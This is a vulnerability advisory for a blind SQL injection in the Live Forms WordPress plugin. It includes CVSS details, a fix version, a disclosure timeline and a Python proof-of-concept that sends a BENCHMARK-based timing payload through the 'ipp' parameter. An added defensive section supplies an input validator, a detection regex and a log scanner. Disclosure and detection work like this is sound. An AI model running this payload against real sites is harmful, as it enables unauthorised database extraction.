Live Forms - Visual Form Builder 3.0.1, Blind SQL Injection
The AJAX action ‘get_reqlist’ is available to all logged-in users. The parameter ‘ipp’ sent to this action is vulnerable to blind MySQL injection. Because the query result is never returned to the user, the injection is time-based: an injected condition is confirmed by measuring how long the query takes to return.
Homepage
https://wordpress.org/plugins/liveforms/
CVSS Score
3.5
CVSS Vector
(AV:N/AC:M/Au:S/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 3.2.0.
Proof of Concept
import requests
s = requests.session()
target = 'http://localhost:8000'
# Step 1: authenticate as an ordinary registered user (no elevated role needed).
url = '%s/wp-login.php'%target
payload = {
"log":"test",
"pwd":"test",
"wp-submit":"Log+In"
}
r = s.post(url, data=payload)
# Step 2: call the get_reqlist AJAX action with the injection in 'ipp'.
# The condition checks the first character of version(); when it matches,
# BENCHMARK() delays the response noticeably, which is the only observable signal.
url = '%s/wp-admin/admin-ajax.php'%target
payload = {
"action":"get_reqlist",
"form_id":"1",
"ipp":"1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)"
}
headers = {
"X-Requested-With":"XMLHttpRequest"
}
r = s.post(url, data=payload, headers=headers)
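The description above and the proof of concept together give a defender two handles on this bug: the server-side fix (treat ‘ipp’ as a plain integer before it reaches SQL) and a detection rule for the time-based technique. The following example is added here and is not part of the advisory or the plugin's code; it models the input check in Python rather than in the plugin's PHP, and it runs over a constructed request log (timestamp, user, path, status, response time in ms, URL-encoded POST body) whose third line reuses the advisory's injection string. Column layout, parameter bound and timing threshold are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request log (not from the advisory). Tab-separated:
# timestamp, authenticated user, path, HTTP status, response time (ms), POST body.
# Line 3 carries the advisory's payload in ipp; lines 1 and 2 are benign traffic.
SAMPLE_LOG = [
    "2015-03-18T10:00:01Z\teditor\t/wp-admin/admin-ajax.php\t200\t120\t"
    "action=get_reqlist&form_id=1&ipp=25",
    "2015-03-18T10:00:05Z\teditor\t/wp-admin/admin-ajax.php\t200\t95\t"
    "action=heartbeat&interval=60",
    "2015-03-18T10:00:09Z\ttest\t/wp-admin/admin-ajax.php\t200\t6400\t"
    "action=get_reqlist&form_id=1&ipp=1+PROCEDURE+analyse%28%28select+extractvalue%28rand%28%29%2C"
    "concat%280x3a%2C%28IF%28MID%28version%28%29%2C1%2C1%29+LIKE+5%2C+BENCHMARK%285000000%2C"
    "SHA1%281%29%29%2C1%29%29%29%29%29%2C1%29",
]

# Primitives used by the advisory's payload, plus sleep(), the other common
# MySQL delay function. Anchored on the opening parenthesis to limit false hits
# on ordinary words such as "benchmark" in free-text fields.
TIME_BASED_PRIMITIVES = re.compile(
    r"\b(?:benchmark|sleep)\s*\(|procedure\s+analyse\s*\(|\bextractvalue\s*\(",
    re.IGNORECASE,
)

MAX_IPP = 500  # assumed upper bound for "items per page"


def validate_ipp(raw):
    """Server-side fix modelled here: ipp must be a plain positive integer.

    Anything else (including the advisory's payload) is rejected before it can
    reach the query, which closes the injection regardless of how it is encoded.
    """
    if not re.fullmatch(r"[0-9]{1,4}", raw):
        raise ValueError("ipp must be a positive integer")
    n = int(raw)
    if not 1 <= n <= MAX_IPP:
        raise ValueError("ipp out of range")
    return n


def is_time_based_sqli(value):
    """True when a parameter value contains a timing or error-based SQL primitive."""
    return bool(TIME_BASED_PRIMITIVES.search(value))


def parse_log_line(line):
    ts, user, path, status, duration_ms, body = line.split("\t", 5)
    # parse_qs URL-decodes the body, so the check sees the same text MySQL would.
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"ts": ts, "user": user, "path": path, "status": int(status),
            "duration_ms": int(duration_ms), "params": params}


def scan_log(lines, slow_ms=2000):
    """Return (line_no, user, parameter, reason) findings for admin-ajax requests."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        rec = parse_log_line(line)
        if not rec["path"].endswith("/admin-ajax.php"):
            continue
        # Content check: any parameter carrying a delay/error primitive.
        for name, value in rec["params"].items():
            if is_time_based_sqli(value):
                findings.append((lineno, rec["user"], name,
                                 "time-based SQL primitive in parameter"))
        # Schema check: the vulnerable action must receive a numeric ipp.
        if rec["params"].get("action") == "get_reqlist":
            try:
                validate_ipp(rec["params"].get("ipp", ""))
            except ValueError as exc:
                findings.append((lineno, rec["user"], "ipp",
                                 "rejected by validator: %s" % exc))
        # Behavioural check: blind timing attacks show up as slow AJAX responses.
        if rec["duration_ms"] >= slow_ms:
            findings.append((lineno, rec["user"], "-",
                             "slow admin-ajax response (%d ms)" % rec["duration_ms"]))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("line %d user=%s param=%s: %s" % finding)
```

The three checks are deliberately independent: the validator alone would have prevented this vulnerability, the content pattern catches the payload even where a plugin is still unpatched, and the response-time check is the one signal a time-based blind injection cannot hide, so it is worth alerting on for admin-ajax.php even when the other two are silent.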
Timeline
- 2015-02-16: Discovered
- 2015-03-02: Vendor notified
- 2015-03-09: Follow up email sent to vendor
- 2015-03-09: Vendor responded with intent to fix
- 2015-03-11: Version 3.2.0 released – issue resolved
- 2015-03-18: Advisory released